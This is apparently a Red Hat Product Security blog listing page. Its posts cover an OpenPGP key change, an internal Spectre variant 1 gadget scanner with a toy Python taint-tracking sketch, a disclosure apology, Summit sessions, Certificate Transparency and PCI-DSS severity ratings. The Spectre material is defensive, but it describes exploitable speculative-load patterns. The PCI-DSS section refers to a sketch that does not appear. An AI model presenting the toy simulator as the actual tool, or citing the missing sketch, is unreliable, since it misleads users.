Latest Posts
The Product Security Blog has moved!
Red Hat Product Security has joined forces with other security teams inside Red Hat to publish our content in a common venue using the Security channel of the Red Hat Blog. This move provides a wider variety of important security topics, from experts all over Red Hat, in a more modern and functional interface. We hope everyone will enjoy the new experience!
Posted: 2019-03-19T19:38:17+00:00
New Red Hat Product Security OpenPGP key
Red Hat Product Security has transitioned from using its old 1024-bit DSA OpenPGP key to a new 4096-bit RSA OpenPGP key. This was done to improve the long-term security of our communications with our customers and also to meet current key recommendations from NIST (NIST SP 800-57 Pt. 1 Rev. 4 and NIST SP 800-131A Rev. 1).
The old key will continue to be valid for some time, but it is preferred that all future correspondence use the new key. Replies and new messages either signed or encrypted by Product Security will use this new key.
The old key was:
pub 1024D/0x5E548083650D5882 2001-11-21 Key fingerprint = 92732337E5AD3417526564AB5E548083650D5882
And the new key is:
pub 4096R/0xDCE3823597F5EAC4 2017-10-31 Key fingerprint = 77E79ABE93673533ED09EBE2DCE3823597F5EAC4
To fetch the full key from a public key server, you can simply do:
$ gpg --keyserver keys.fedoraproject.org --recv-key '77E79ABE93673533ED09EBE2DCE3823597F5EAC4'
If you already know the old key, you can now verify that the new key is signed by the old one:
$ gpg --check-sigs '77E79ABE93673533ED09EBE2DCE3823597F5EAC4'
You may also import the public key as listed here:
-----BEGIN PGP PUBLIC KEY BLOCK----- Version: GnuPG v2.0.22 (GNU/Linux) mQINBFn41kMBEACpJL82mKFBTnr4RyCsEseKhMrKaytD19woOwlGSlwFGFsdLKLw 1jtI2ETqjmIIkZ5uNMB0n9xb1h6azgTZdjADGLRjLcMInxGjw/0wlvhXOlXdea/G Klj0YXikdpgINUiMTb5Pyir7K6YQPI27nVk5KTAx3rCA9js7/Br71F+V++PuPud1 wEJ16SbLitdpOHHGtXj3SdldwHDSPEA5PdgKNZDb4cvj9JXw4IRHgayj9SJ/1us8 7SDkAodjbg6axaKo8LmiRFGgjRydrm47sqi2k7ZlimtsDp2QxWJoZVmyLX3AOcZl e2PxdlzM/h/CGZnzK8WgF54Mtp2xLvn+dn4W9SPJgrLofP07cFrPRi8xtWDAzR1g UqsZbmnla5qJuWP5rCkQzmxrazkzv5mpZ7FnGKsypRV0To6Qr6IPD6k/xU9KiiiN 65WBowoct2Zy6nxStkE3KIBb/98u6vKTUjZ0z4M566rBCpsLabR8gcLY6ObxKYmB N2FR5aif6mdEzfrew2rgxTwcCBh7r8QI7LqgYjmQvXw9aCyHgScu+c0aFtW3p3Ro Ia5Q8F7t9dbZlHVGO1hO8/uiHpA7xOu0Db6XhYrUY7Zqw7QiKBDF6yEjOgwcqpcT zV26C3/GzDx74jK5lp6cRPAaQATFpZRjL/tWubM9XCTLtLF9zU1rzf0uPwARAQAB tDZSZWQgSGF0LCBJbmMuIChQcm9kdWN0IFNlY3VyaXR5KSA8c2VjYWxlcnRAcmVk aGF0LmNvbT6JAjcEEwECACEFAln41kMCGwMGCwkIBwMCBhUIAgkKCwMWAgECHgEC F4AACgkQ3OOCNZf16sSxiw/+I//qjbUaV1rXfg7PDiDA6/SdfSnPoutxk5Gbm//o F/NZaJKh7+EgeDhDsFVnIH70YH6mgCHSVpBDHdLMQ7YvfRdeZeZciCqqnOe76A5o 7mraOEODh/y/W5sa9O3eG9YzEqReahqaFXe3r/JpaZ/C+o5mjqzsfb1WFCv/KC3j Mhgfi7LJ2EpGcGlQ/e42i939SF0KrEG0B89EI+XF6utWJpQX+XSi9RPTq1+YrJnp xhnA93A5C0XZ7H3xW86qguUEYGHuRV6Jfqllh0n3VNKQde5Bik1wHbvrpoGCiO9C Gz9zVT62RoH22cAZhUQ6hyN5itGe51mBuUdfsLeY0BYt9mA6hhZPUWlAynYMqkn1 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 =Yp+7 -----END PGP PUBLIC KEY BLOCK-----
If you are satisfied that you've got the right key, and the UIDs match what you expect, you may import and begin using the new key when communicating with us at secalert@redhat.com.
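If you script your key management, the following sketch shows one way to automate the fetch-and-verify step using the third-party python-gnupg bindings (an assumption: the python-gnupg package and a local gpg binary are installed; this is an illustration, not an officially supported workflow):
import gnupg  # third-party python-gnupg package, wraps the local gpg binary

EXPECTED_FINGERPRINT = "77E79ABE93673533ED09EBE2DCE3823597F5EAC4"

gpg = gnupg.GPG()
gpg.recv_keys("keys.fedoraproject.org", EXPECTED_FINGERPRINT)

# Accept the key only if the full fingerprint matches the one published above.
fingerprints = {key["fingerprint"] for key in gpg.list_keys()}
print("new key present with matching fingerprint:", EXPECTED_FINGERPRINT in fingerprints)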
Posted: 2018-08-22T13:30:00+00:00
SPECTRE Variant 1 scanning tool
As part of Red Hat's commitment to product security, we have developed a tool internally that can be used to scan for variant 1 SPECTRE vulnerabilities. In keeping with our commitment to the wider user community, we are introducing this tool in this article.
This tool is not a Red Hat product. As such, it is not supported and does not come with any kind of warranty.
The tool only works on static binaries and does not simulate an entire running system. This means it will neither follow jumps through a PLT into a shared library, nor will it emulate the loading of extra code via the dlopen() function.
The tool currently only supports the x86_64 and AArch64 architectures. We do hope to add additional architectures in the future.
The tool is currently available in source form as it would be unwise to offer a security analysis tool as a pre-compiled binary. There are details on how to obtain the source and build the tool later in this article.
Running
To use the scanner simply invoke it with the path to a binary to scan and a starting address inside the binary:
x86_64-scanner vmlinux --start-address=0xffffffff81700001
Note - these examples are using the x86_64 scanner, but the AArch64 scanner behaves in the same way.
The start address will presumably be a syscall entry point, and the binary a kernel image (uncompressed; the scanner does not yet know how to decompress compressed kernels). Alternatively, the binary could be a library and the address an external function entry point into that library. In fact, the scanner will handle any kind of binary, including user programs, libraries, modules, plugins, and so on.
A start address is needed in order to keep things simple and to avoid extraneous output. In theory, the scanner could examine every possible code path through a binary, including ones not normally accessible to an attacker. But this would produce too much output. Instead, a single start address is used in order to restrict the search to a smaller region. Naturally the scanner can be run multiple times with different starting addresses each time, so that all valid points of attack can be scanned.
The output of the scanner will probably look like this:
X86 Scanner: No sequences found.
Or, if something is found, like this:
X86 Scanner: Possible sequence found, based on a starting address of 0:
X86 Scanner: 000000: nop
X86 Scanner: COND: 000001: jne &0xe
X86 Scanner: 00000e: jne &0x24
X86 Scanner: LOAD: 000010: mov 0xb0(%rdi),%rcx
X86 Scanner: 000017: mov 0xb0(%rsp),%rax
X86 Scanner: 00001f: nop
X86 Scanner: LOAD: 000020: mov 0x30(%rcx),%rbx
This indicates that entering the test binary at address 0x0 can lead to a conditional jump at address 0x1 that would trigger speculation. A load at address 0x10 then uses an attacker-provided value (in %rdi), which might influence a second load at 0x20.
One important point to remember about the scanner’s output is that it is only a starting point for further investigation. Closer examination of the code flagged may reveal that an attacker could not actually use it to exploit the Spectre vulnerability.
Note - currently the scanner does not check that the starting address is actually a valid instruction address. (It does check that the address lies inside the binary image provided.) So if an invalid address is provided, unexpected errors can be generated.
Note - the scanner sources include two test files, one for x86_64 (x86_64_test.S) and one for AArch64 (aarch64_test.S). These can be used to test the functionality of the scanner.
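Since the scanner is typically run once per entry point, a small wrapper can be convenient. The sketch below is an illustration only; it assumes x86_64-scanner is on your PATH, that the listed addresses are valid entry points, and that the "Possible sequence found" text shown above remains in the output:
import subprocess

BINARY = "vmlinux"                      # uncompressed kernel image to scan
ENTRY_POINTS = [                        # placeholder syscall entry addresses
    "0xffffffff81700001",
]

for addr in ENTRY_POINTS:
    result = subprocess.run(
        ["x86_64-scanner", BINARY, f"--start-address={addr}"],
        capture_output=True, text=True)
    # The sample output above reports hits with "Possible sequence found".
    flagged = "Possible sequence found" in result.stdout
    print(f"{BINARY} @ {addr}: {'needs review' if flagged else 'no sequences reported'}")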
How It Works
The scanner is basically a simulator that emulates the execution of the instructions from the start address until the code reaches a return instruction which would return to whatever called the start address. It tracks values in registers and memory (including the stack, data sections, and the heap).
Whenever a conditional branch is encountered, the scanner splits itself and follows both sides of the branch. This is repeated at every encounter, subject to an upper limit set by the --max-num-branches option.
The scanner assumes that at the start address only the stack and those registers used for parameter passing could contain attacker-provided values. This helps prevent false positive results involving registers that could not have been compromised by an attacker.
The scanner keeps a record of the instructions it encounters, noting which of them might trigger speculation and which might be used to load values from restricted memory, so that it can report back when it finds a possible vulnerability.
The scanner also knows about the speculation denial instructions (lfence, pause, csdb), and it will stop a scan whenever it encounters one of them.
The scanner has a built-in limit on the total number of instructions that it will simulate on any given path. This is so that it does not get stuck in infinite loops. Currently the limit is set at 4096 instructions.
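To make the description above concrete, here is a deliberately tiny Python sketch of the same idea. This is not the scanner's code and it does not decode real x86_64 instructions; the made-up register machine and taint rules are assumptions used purely for illustration. It forks at a conditional branch, treats the argument register as attacker-controlled, and reports a load whose address depends on an earlier attacker-controlled load:
MAX_INSNS = 4096       # mirrors the per-path instruction cap described above
MAX_BRANCHES = 32      # mirrors the default branch-following limit

# Each instruction is (opcode, dst, src) on a made-up register machine.
PROGRAM = [
    ("cmp",    None, "r1"),   # 0: bounds check on attacker-controlled r1
    ("jne",    5,    None),   # 1: conditional branch opens a speculation window
    ("load",   "r2", "r1"),   # 2: first load, address taken from attacker register r1
    ("load",   "r3", "r2"),   # 3: second load, address depends on the first load
    ("ret",    None, None),   # 4
    ("lfence", None, None),   # 5: speculation barrier, scanning stops here
    ("ret",    None, None),   # 6
]

def scan(pc, attacker, loaded, speculating, branches):
    """Follow one path, returning positions of suspicious dependent loads."""
    findings = []
    for _ in range(MAX_INSNS):              # hard cap avoids infinite loops
        op, dst, src = PROGRAM[pc]
        if op in ("ret", "lfence"):         # end of path or speculation barrier
            return findings
        if op == "jne":                     # fork and follow both sides of the
            if branches >= MAX_BRANCHES:    # branch; we cannot know which side
                return findings             # will be mispredicted
            for target in (dst, pc + 1):
                findings += scan(target, set(attacker), set(loaded),
                                 True, branches + 1)
            return findings
        if op == "load":
            if speculating and src in loaded:
                findings.append(pc)         # address derived from an earlier
                                            # attacker-controlled load: report it
            if speculating and src in attacker:
                loaded.add(dst)             # value fetched via an attacker-chosen address
        elif op == "mov":
            for taint in (attacker, loaded):    # propagate taint through copies
                if src in taint:
                    taint.add(dst)
                else:
                    taint.discard(dst)
        pc += 1
    return findings

# At the entry point, only argument registers (here just r1) and the stack are
# assumed to hold attacker-provided values, as described above.
for hit in scan(pc=0, attacker={"r1"}, loaded=set(), speculating=False, branches=0):
    print("possible Spectre v1 sequence: dependent load at instruction", hit)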
Options
The scanner supports a --verbose option, which makes it tell you more about what it is doing. If this option is repeated, it will tell you even more, possibly too much. The --quiet option, on the other hand, disables most output (unless there is an internal error), although the tool still returns a zero or non-zero exit value depending upon whether any vulnerabilities were found.
There is also a --max-num-branches option, which restricts the scanner to following no more than the specified number of conditional branches. The default is 32, so this option can be used to increase or decrease the amount of scanning performed by the tool.
By default the scanner assumes that the file being examined is in the ELF file format, but the --binary option overrides this and causes the input to be treated as a raw binary file. In this format the address of the first byte in the file is considered to be zero, the second byte is at address 1, and so on.
The x86_64 scanner uses Intel syntax in its disassembly output by default, but you can change this with the --syntax=att option.
Building
The source for the scanner is available for download. In order to build the scanner from the source you will also need a copy of the FSF binutils source.
Note - it is not sufficient to just install the binutils package or the binutils-devel package, as the scanner uses header files that are internal to the binutils sources. This requirement is an artifact of how the scanner evolved and it will be removed one day.
Note - you do not need to build a binutils release from these sources, but if you do not, then you will need to install the binutils and binutils-devel packages on your system so that the binutils libraries are available for linking the scanner. In theory it should not matter if you have different versions of the binutils sources and binutils packages installed, as the scanner only makes use of very basic functions in the binutils library, ones that do not change between released versions.
Edit the makefile and select the version of the scanner that you want to build (AArch64 or x86_64). Also edit the CFLAGS variable to point to the binutils sources.
If you are building the AArch64 version of the tool you will also need a copy of the GDB sources from which you will need to build the AArch64 simulator:
./configure --target=aarch64-elf
make all-sim
Then edit the makefile and change the AARCH64 variables to point to the built sim. To build the scanner once these edits are complete just run "make".
Feedback
Feedback on problems building or running the scanner is very much welcome. Please send it to Nick Clifton. We hope that you find this tool useful.
Red Hat is also very interested in collaborating with any party that is concerned about this vulnerability. If you would like to pursue this, please contact Jon Masters.
Posted: 2018-07-18T13:30:00+00:00
Red Hat’s disclosure process
Last week, a vulnerability (CVE-2018-10892) that affected CRI-O, Buildah, Podman, and Docker was made public before some affected upstream projects were notified. We regret that this was not handled in a way that lives up to our own standards around responsible disclosure. It has caused us to look back to see what went wrong so as to prevent this from happening in the future.
Because of how important our relationships with the community and industry partners are and how seriously we treat non-public information irrespective of where it originates, we are taking this event as an opportunity to look internally at improvements and challenge assumptions we have held.
We conducted a review and are using this to develop training around the handling of non-public information relating to security vulnerabilities, and ensuring that our relevant associates have a full understanding of the importance of engaging with upstreams as per their, and our, responsible disclosure guidelines. We are also clarifying communication mechanisms so that our associates are aware of the importance of and methods for notifying upstream of a vulnerability prior to public disclosure.
Red Hat values and recognizes the importance of relationships, be they with upstreams, downstreams, industry partners and peers, customers, or vulnerability reporters. We embrace open source development principles including trust and transparency. As we navigate through a landscape full of software that will inevitably contain security vulnerabilities we strive to manage each flaw with the same degree of care and attention, regardless of its potential impact. Our commitment is to work with other vendors of Linux and open source software to reduce the risk of security issues through responsible information sharing and peer reviews.
This event has reminded us that it is important to remain vigilant, provide consistent, clear guidance, and handle potentially sensitive information appropriately. And while our track record of responsible disclosure speaks for itself, when an opportunity presents itself to revisit, reflect, and improve our processes, we make the most of it to ensure we have the proper procedures and controls in place.
Red Hat takes its participation in open source projects and security disclosure very seriously. We have discovered hundreds of vulnerabilities and our dedicated Product Security team has participated in responsible disclosures for more than 15 years. We strive to get it right every time, but this time we didn't quite live up to the standards to which we seek to hold ourselves. Because we believe in open source principles such as accountability, we wanted to share what had happened and how we have responded to it. We are sincerely apologetic for not meeting our own standards in this instance.
Posted: 2018-07-10T13:00:00+00:00
Join us in San Francisco at the 2018 Red Hat Summit
This year’s Red Hat Summit will be held on May 8-10 in beautiful San Francisco, USA. Product Security will be joining many Red Hat security experts in presenting and assisting subscribers and partners at the show. Here is a sneak peek at the more than 125 sessions that a security-minded attendee can see at Summit this year.
Sessions
Cloud Management and Automation
S1181 - Automating security and compliance for hybrid environments
S1467 - Live demonstration: Find it. Fix it. Before it breaks.
S1104 - Distributed API Management in a Hybrid Cloud Environment
Containers and Openshift
S1049 - Best practices for securing the container life cycle
S1260 - Hitachi & Red Hat collaborate: container migration guide
S1220 - Network Security for Apps on OpenShift
S1225 - OpenShift for Operations
S1778 - Security oriented OpenShift within regulated environments
S1689 - Automating Openshift Secure Container Deployment at Experian
Infrastructure Modernization & Optimization
S1727 - Demystifying systemd
S1741 - Deploying SELinux successfully in production environments
S1329 - Operations Risk Remediation in Highly Secure Infrastructures
S1515 - Path to success with your Identity Management deployment
S1936 - Red Hat Satellite 6 power user tips and tricks
S1907 - Satellite 6 Securing Linux lifecycle in the Public Sector
S1931 - Security Enhanced Linux for Mere Mortals
S1288 - Smarter Infrastructure Management with Satellite & Insights
Middleware + Modern App Dev Security
S1896 - Red Hat API Management Overview, Security Models and Roadmap
S1863 - Red Hat Single Sign-On Present and Future
S1045 - Securing Apps & Services with Red Hat Single-Sign On
S2109 - Securing service mesh, micro services and modern applications with JWT
S1189 - Mobile in a containers world
Value of the Red Hat Subscription
S1916 - Exploiting Modern Microarchitectures: Meltdown, Spectre, and other hardware security vulnerabilities in modern processors
S2702 - The Value of a Red Hat Subscription
Roadmaps & From the Office of the CTO
S2502 - Charting new territories with Red Hat
S9973 - Getting strategic about security
S1017 - Red Hat Security Roadmap : It's a Lifestyle, Not a Product
S1000 - Red Hat Security Roadmap for Hybrid Cloud
S1890 - What's new in security for Red Hat OpenStack Platform?
Instructor-Led Security Labs
L1007, L1007R - A practical introduction to container security (3rd ed.)
L1036 - Defend Yourself Using Built-in RHEL Security Technologies
L1034, L1034R - Implementing Proactive Security and Compliance Automation
L1051 - Linux Container Internals: Part 1
L1052 - Linux Container Internals: Part 2
L1019 - OpenShift + RHSSO = happy security teams and happy users
L1106, L1106R - Practical OpenSCAP
L1055 - Up and Running with Red Hat Identity Management
Security Mini-Topic Sessions
M1022 - A problem's not a problem, until it's a problem (Red Hat Insights)
M1140 - Blockchain: How to identify good use cases
M1087 - Monitor and automate infrastructure risk in 15 minutes or less
Security Birds-of-a-Feather Sessions
B1009 - Connecting the Power of Data Security and Privacy
B1990 - Grafeas to gate your deployment pipeline
B1046 - I'm a developer. What do I need to know about security?
B1048 - Provenance and Deployment Policy
B1062 - The Red Hat Security BoF - Ask us (most) anything
B1036 - Virtualization: a study
B2112 - Shift security left - and right - in the container lifecycle
Security Panels
P1757 - DevSecOps with disconnected OpenShift
P1041 - Making IoT real across industries
Security Workshops
W1025 - Satellite and Insights Test-drive
On top of the sessions, Red Hat Product Security will be there playing fun educational games like our Flawed and Branded card game and the famous GAME SHOW! GAME SHOW!
No matter what your interest or specialty is, Red Hat Summit definitely has something for you. Come learn more about the security features and practices around our products! We're looking forward to seeing you there!
Posted: 2018-04-23T14:30:00+00:00
Certificate Transparency and HTTPS
Google has announced that on April 30, 2018, Chrome will:
“...require that all TLS server certificates issued after 30 April, 2018 be compliant with the Chromium CT Policy. After this date, when Chrome connects to a site serving a publicly-trusted certificate that is not compliant with the Chromium CT Policy, users will begin seeing a full page interstitial indicating their connection is not CT-compliant. Sub-resources served over https connections that are not CT-compliant will fail to load and will show an error in Chrome DevTools.”
So what exactly does this mean, and why should one care?
What is a CT policy?
CT stands for “Certificate Transparency” and, in simple terms, means that all certificates for websites will need to be registered by the issuing Certificate Authority (CA) in at least two public Certificate Logs.
When a CA issues a certificate, it now must make a public statement in a trusted database (the Certificate Log) that, at a certain date and time, they issued a certificate for some site. The reason is that, for more than a year, many different CAs have issued certificates for sites and names for which they shouldn't have (like "localhost" or "1.2.3.") or have issued certificates in response to fraudulent requests (e.g. people who are not BigBank asking for certificates for bigbank.example.com). By placing all requested certificates into these Certificate Logs, other groups, such as security researchers and companies, can monitor what is being issued and raise red flags as needed (e.g. if you see a certificate issued for your domain that you did not request).
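As a rough illustration of that kind of monitoring, the short sketch below queries crt.sh, a public search frontend for the Certificate Logs (an assumption: its unofficial JSON output and the field names shown here may change, so treat this as a starting point rather than a supported API):
import json
import urllib.request

DOMAIN = "example.com"   # placeholder: a domain you control

# %25. is a URL-encoded "%." wildcard, matching any subdomain of DOMAIN.
url = f"https://crt.sh/?q=%25.{DOMAIN}&output=json"
with urllib.request.urlopen(url, timeout=30) as response:
    entries = json.load(response)

for entry in entries:
    # Field names as observed in crt.sh output; unofficial and subject to change.
    print(entry.get("not_before"), entry.get("issuer_name"),
          entry.get("name_value", "").replace("\n", ", "))
Any issuer or name in that output that you do not recognize is exactly the kind of red flag the Certificate Logs are meant to surface.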
If you do not announce your certificates in these Certificate Logs, the Chrome web browser will generate an error page that the user must click through before going to the page they were trying to load, and if a page contains elements (e.g. from advertising networks) that are served from non CT-compliant domains, they will simply not be loaded.
Why is Google doing this?
Well, there are probably several reasons, but the main ones are:
- As noted, several CAs have been discovered issuing certificates wrongly or fraudulently, putting Internet users at risk. This technical solution will greatly reduce the risk, as such wrongly or fraudulently issued certificates can be detected quickly.
- More importantly, this prepares for a major change coming to the Chrome web browser in July 2018, in which all HTTP websites will be labeled as "INSECURE", which should significantly drive up the adoption of HTTPS. This adoption will, of course, result in a flood of new certificates which, combined with the oversight provided by Certificate Logs, should help to catch fraudulently or wrongly-obtained certificates.
What should a web server operator do?
The first step is to identify your web properties, both external facing and internal facing. Then it’s simply a matter of determining whether you:
- want the certificate for a website to show up in the Certificate Log so that the Chrome web browser does not generate an error (e.g. your public facing web sites will want this), or
- absolutely do not want that particular certificate to show up in the Certificate Logs (e.g. a sensitive internal host), and you're willing to live with Chrome errors.
Depending on how your certificates are issued, and who issued them, you may have some time before this becomes an issue (if, for example, you use a service that issues short-lived certificates, you will be affected by this sooner). Also please note that some certificate issuers, like Amazon's AWS Certificate Manager, do allow you to opt out of reporting certificates to the Certificate Logs, a useful feature for certificates being used on systems that are "internal" and that you do not want the world to know about.
It should be noted that in the long term, option 2 (not reporting certificates to the Certificate Logs) will become increasingly problematic as it is possible that Google may simply have Chrome block them rather than generate an error. So, with that in mind, now is probably a good time to start determining how your security posture will change when all your HTTPS-based hosts are effectively being enumerated publicly. You will also need to determine what to do with any HTTP web sites, as they will start being labelled as “INSECURE” within the next few months, and you may need to deploy HTTPS for them, again resulting in them potentially showing up in the Certificate Logs.
Posted: 2018-04-17T15:00:01+00:00
Let's talk about PCI-DSS
For those who aren’t familiar with the Payment Card Industry Data Security Standard (PCI-DSS), it is the standard that is intended to protect our credit card data as it flows between systems and is stored in company databases. PCI-DSS requires that all vulnerabilities rated at CVSS 4.0 or higher be addressed by PCI-DSS compliant organizations (notably, those which process and/or store cardholder data). While this was done with the best of intentions, it has had an impact on many organizations' capability to remediate these vulnerabilities in their environments.
The qualitative severity ratings of vulnerabilities as categorized by Red Hat Product Security do not directly align with the baseline ratings recommended by CVSS. These CVSS scores and ratings are used by PCI-DSS and most scanning tools. As a result, there may be cases where a vulnerability rated as low severity by Red Hat exceeds the CVSS threshold recommended for PCI-DSS.
Red Hat has published guidelines on vulnerability classification. Red Hat Product Security prioritizes security flaw remediation on Critical and Important vulnerabilities, which can lead to a compromise of confidentiality, data integrity, and/or availability. This is not intended to downplay the importance of lower severity vulnerabilities, but rather aims to target those risks which are seen as most important by our customers and industry at large. CVSS ratings for vulnerabilities build upon a set of assumptions and factor in a worst-case scenario (i.e. the CVSS calculator leaves all Temporal and Environmental factors set to “undefined”), which assumes an environment that has no security mitigations or blocking controls in place and might not be an accurate representation of your environment. Specifically, a given flaw may be less significant in your application depending on how the function is used, whether it is exposed to untrusted data, or whether it enforces a privilege boundary. It is Red Hat’s position that base CVSS scores alone cannot reliably be used to fully capture the importance of flaws in every use case.
In most cases, security issues will be addressed when updates are available upstream. However, as noted above, there may be cases where a vulnerability rated as low severity by Red Hat exceeds the CVSS threshold for vulnerability mitigation set by the PCI-DSS standard and is considered actionable by a security scanner or during an audit by a Qualified Security Assessor (QSA).
In light of the above, Red Hat does not claim any of its products meet PCI-DSS compliance requirements. We do strive to provide secure software solutions and guidance to help remediate vulnerabilities of notable importance to our customers.
When there is a discrepancy in the security flaw ratings, we suggest the following:
- Harden your system: Determine if the component is needed or used. In many cases, scans will pick up on packages which are included in the distribution but do not need to be deployed in the production environment. If customers can remove these packages, or replace them with another unaffected package, without impacting their functional system, they reduce the attack surface and the number of components which might be targeted.
- Validate the application: Determine if the situation is a false positive. (Red Hat often backports fixes, which may result in false positives for version-detecting scanning products.)
- Self-evaluate the severity: Update the base CVSS score by calculating the environmental factors that are relevant, and document the updated CVSS score for the vulnerability in your environment (see the sketch after this list). All CVSS vector strings in our CVE pages link to the CVSS calculator on FIRST's website, with the base score pre-populated so that customers just need to fill in their other metrics.
- Implement other controls to limit (or eliminate) exposure of the vulnerable interface or system.
